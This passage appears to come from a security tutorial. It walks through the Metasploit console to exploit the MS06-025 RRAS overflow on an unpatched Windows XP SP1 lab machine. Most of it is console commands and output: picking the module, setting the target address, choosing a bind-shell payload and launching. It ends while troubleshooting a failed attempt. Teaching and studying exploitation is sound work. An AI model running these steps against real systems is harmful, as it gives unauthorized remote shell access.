Using the Metasploit Console to Launch Exploits: Victim unpatched XP SP 1

Exploit an unpatched XP Service Pack 1 machine missing the RRAS security update (MS06-025). We’ll try to get a remote command shell running on that box using the RRAS exploit built into the Metasploit framework.

Metasploit can pair any Windows exploit with any Windows payload. So we can choose to use the RRAS vulnerability to open a command shell, create an administrator, start a remote VNC session, or to do a bunch of other stuff. Let’s get started.

$ ./msfconsole
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ msf v3.0
+ -- --=[ 177 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 30 aux
msf >


The interesting commands to start with are:

show <exploits | payloads>
info <exploit | payload> <name>
use <exploit-name>

Other commands can be found by typing help. Our first task will be to find the name of the RRAS exploit so we can use it:

msf > show exploits

Exploits
========
Name Description
---- -----------
...
windows/smb/ms04_011_lsass Microsoft LSASS Service
DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde Microsoft NetDDE Service
Overflow
windows/smb/ms05_039_pnp Microsoft Plug and Play Service
Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN
Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service
NetpwPathCanonicalize Overflow
…

There it is! Metasploit calls it windows/smb/ms06_025_rras. We’ll use that exploit and then go looking for all the options needed to make the exploit work.

msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >

Notice that the prompt changes to enter “exploit mode” when you use an exploit module. Any options or variables you set while configuring this exploit will be retained so you don’t have to reset the options every time you run it. You can get back to the original launch state at the main console by issuing the back command.

msf exploit(ms06_025_rras) > back
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >

Different exploits have different options. Let’s see what options need to be set to make the RRAS exploit work.

msf exploit(ms06_025_rras) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)

This exploit requires a target address, the port number SMB (server message block) uses to listen, and the name of the pipe exposing this functionality.

msf exploit(ms06_025_rras) > set RHOST 192.168.1.220
RHOST => 192.168.1.220

As you can see, the syntax to set an option is set <OPTION-NAME> <option>

Metasploit is often particular about the case of the option name and option, so it is best to use uppercase if the option is listed in uppercase. With the exploit module set, we next need to set the payload and the target type. The payload is the action that happens after the vulnerability is exploited. It’s like choosing what you want to happen as a result of exploiting the vulnerability. For this first example, let’s use a payload that simply opens a command shell listening on a TCP port.

msf exploit(ms06_025_rras) > show payloads

Compatible payloads
===================
...
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw Windows Disable Windows ICF, Command
Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP
Inline
...

Here we see three payloads, each of which can be used to load an inline command shell. The use of the word “inline” here means the command shell is set up in one roundtrip. The alternative is “staged” payloads, which fit into a smaller buffer but require an additional network roundtrip to set up. Due to the nature of some vulnerabilities, buffer space in the exploit is at a premium and a staged exploit is a better option.

This XP SP1 machine is not running a firewall, sowe’ll choose a simple bind shell and will accept the default options.

msf exploit(ms06_025_rras) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_025_rras) > show options

Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.220 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port

The exploit and payload are both set. Next we need to set a target type. Metasploit has some generic exploits that work on all platforms, but for others you’ll need to specify a target operating system.

msf exploit(ms06_025_rras) > show targets

Exploit targets:
Id Name
-- ----
0 Windows 2000 SP4
1 Windows XP SP1
msf exploit(ms06_025_rras) > set TARGET 1
TARGET => 1
All set! Let’s kick off the exploit.
msf exploit(ms06_025_rras) > exploit
[*] Started bind handler
[-] Exploit failed: Login Failed: The SMB server did not reply to our request Hmm…Windows XP SP1 should not require authentication for this exploit. The Microsoft security bulletin lists XP SP1 as anonymously attackable. Let’s take a closer look at this exploit.

msf exploit(ms06_025_rras) > info
Name: Microsoft RRAS Service Overflow
Version: 4498
Platform: Windows
Privileged: Yes
License: Metasploit Framework License
Provided by:
Nicolas Pouvesle <nicolas.pouvesle@gmail.com>
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Windows 2000 SP4
1 Windows XP SP1
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.220 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Payload information:
Space: 1104
Avoid: 1 characters

Description:
This module exploits a stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.

The exploit description claims that to attack XP SP1, the SMBPIPE option needs to be set to SRVSVC. You can see from our preceding options display that the SMBPIPE is set to ROUTER. Before blindly following instructions, let’s explore which pipes are accessible on this XP SP1 target machine and see why ROUTER didn’t work. Metasploit version 3 added several auxiliary modules, one of which is a named pipe enumeration tool. We’ll use that to see if this ROUTER named pipe is exposed remotely.